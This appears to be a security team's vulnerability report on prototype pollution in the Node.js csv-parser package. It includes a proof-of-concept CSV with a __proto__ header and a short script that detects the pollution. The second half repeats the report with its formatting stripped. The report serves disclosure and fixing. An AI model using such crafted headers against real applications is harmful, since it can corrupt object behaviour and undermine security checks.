hi, we are a security team. We found a Prototype Pollution vulnerability in your project.
- Operating System: All
- Node Version: All LTS versions
- NPM Version: All
- csv-parser Version: All versions
Expected Behavior
- CSV headers containing special keys like
__proto__ or constructor should be treated as ordinary string property names (not prototype chain modifiers).
- Parsing CSV files should not modify the prototype of
Row instances or the global Object.prototype.
- Object property assignment during parsing should be safe and not cause prototype pollution.
Actual Behavior
- When parsing CSV files with
__proto__/constructor as headers, the _compile() method dynamically generates Row constructor code that directly uses unfiltered header names.
- Assignment statements like
this["__proto__"] = cells[1] modify the prototype chain of the Row instance, leading to global Object.prototype pollution.
- Arbitrary properties (e.g.,
polluted: "yes") are injected into the global prototype, causing unexpected behavior (e.g., unauthorized property inheritance, broken instanceof checks).
- The
constructor header injection overwrites the constructor reference of Row instances, corrupting prototype inheritance logic.
How Do We Reproduce?
- Install csv-parser (any version):
2.Create a malicious CSV file named malicious.csv
```csv
name,__proto__,value
device1,{"polluted":"yes"},100
3.Create a test script poc.js:
const fs = require('fs');
const csv = require('csv-parser');
// Check initial state (should be undefined)
console.log('Before parsing:', Object.prototype.polluted);
// Parse the malicious CSV file
fs.createReadStream('malicious.csv')
.pipe(csv())
.on('data', (row) => {
console.log('Parsed row data:', row);
})
.on('end', () => {
// Verify prototype pollution (vulnerable versions return "yes")
console.log('After parsing:', Object.prototype.polluted);
});4.Run the script:
5.Observe the output:
Expected: Before parsing: undefined / After parsing: undefined
Actual (vulnerable): Before parsing: undefined / After parsing: yes
hi, we are a security team. We found a Prototype Pollution vulnerability in your project.
Expected Behavior
__proto__orconstructorshould be treated as ordinary string property names (not prototype chain modifiers).Rowinstances or the globalObject.prototype.Actual Behavior
__proto__/constructoras headers, the_compile()method dynamically generatesRowconstructor code that directly uses unfiltered header names.this["__proto__"] = cells[1]modify the prototype chain of theRowinstance, leading to globalObject.prototypepollution.polluted: "yes") are injected into the global prototype, causing unexpected behavior (e.g., unauthorized property inheritance, brokeninstanceofchecks).constructorheader injection overwrites the constructor reference ofRowinstances, corrupting prototype inheritance logic.How Do We Reproduce?
3.Create a test script poc.js:
4.Run the script:
5.Observe the output:
Expected: Before parsing: undefined / After parsing: undefined
Actual (vulnerable): Before parsing: undefined / After parsing: yes